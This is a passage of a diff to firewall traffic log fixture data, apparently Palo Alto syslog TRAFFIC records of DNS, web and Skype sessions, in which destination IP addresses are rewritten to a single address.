04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,21948,1,52537,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,26279,1,53155,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:52,24894,1,59197,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:21,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24985,1,56995,53,0,0,0x200000,udp,allow,251,88,163,2,2012/04/10 04:39:22,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25380,1,59069,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24994,1,55697,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25451,1,59295,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:51,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,24866,1,59196,80,0,0,0x200000,tcp,allow,1500,578,922,13,2012/04/10 04:39:20,1,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 -Oct 30 09:46:32 1,2012/10/30 
09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26414,1,59291,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26131,1,52858,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26555,1,61383,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,15099,1,59290,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,8.5.1.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24980,1,59195,80,0,0,0x200000,tcp,allow,28096,1310,26786,39,2012/04/10 04:39:20,0,not-resolved,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,17,22 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:50,26215,1,49812,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25881,1,50185,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24955,1,59286,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25572,1,54448,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26208,1,53121,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 
09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,14931,1,59323,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25544,1,59322,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25308,1,55766,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26376,1,55072,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25118,1,59207,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 
04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26146,1,59209,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:28,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25272,1,59208,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,24069,1,59318,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 
04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26161,1,59206,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26000,1,59205,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,65184,1,56858,80,0,0,0x200000,tcp,allow,1910,1359,551,21,2012/04/10 04:29:54,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26522,1,59314,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 
04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26067,1,59313,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26573,1,52139,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26894,1,60592,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25258,1,57322,53,0,0,0x200000,udp,allow,164,66,98,2,2012/04/10 04:39:26,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:56,25025,1,59204,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26138,1,59203,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,27175,1,59305,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26261,1,64005,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25022,1,58768,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24027,1,47752,13069,0,0,0x200000,udp,allow,1008,504,504,16,2012/04/10 04:37:50,125,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,8,8 +Oct 30 
09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26360,1,59304,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26394,1,54533,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24917,1,59201,80,0,0,0x200000,tcp,allow,9967,837,9130,20,2012/04/10 04:39:24,1,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,10,10 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,22860,1,59303,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,14146,1,50876,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 
04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25876,1,57657,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24910,1,59302,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26862,1,59301,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26222,1,64844,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26329,1,52257,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25142,1,38796,53,0,0,0x0,udp,allow,206,95,111,2,2012/04/10 
04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25095,1,59200,80,0,0,0x200000,tcp,allow,1503,597,906,13,2012/04/10 04:39:23,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,paloalto-wildfire-cloud,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,24787,1,48412,443,0,0,0x0,tcp,allow,5817,804,5013,17,2012/04/10 04:39:24,0,computer-and-internet-security,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,10,7 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25948,1,47752,40026,0,0,0x200000,udp,allow,286,187,99,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25444,1,47752,40029,0,0,0x200000,udp,allow,978,76,902,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 +Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25349,1,52189,53,0,0,0x0,udp,allow,227,86,141,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 +Oct 30 09:46:22 1,2012/10/30 
09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25713,1,59300,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,26499,1,54414,53,0,0,0x200000,udp,allow,73,73,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 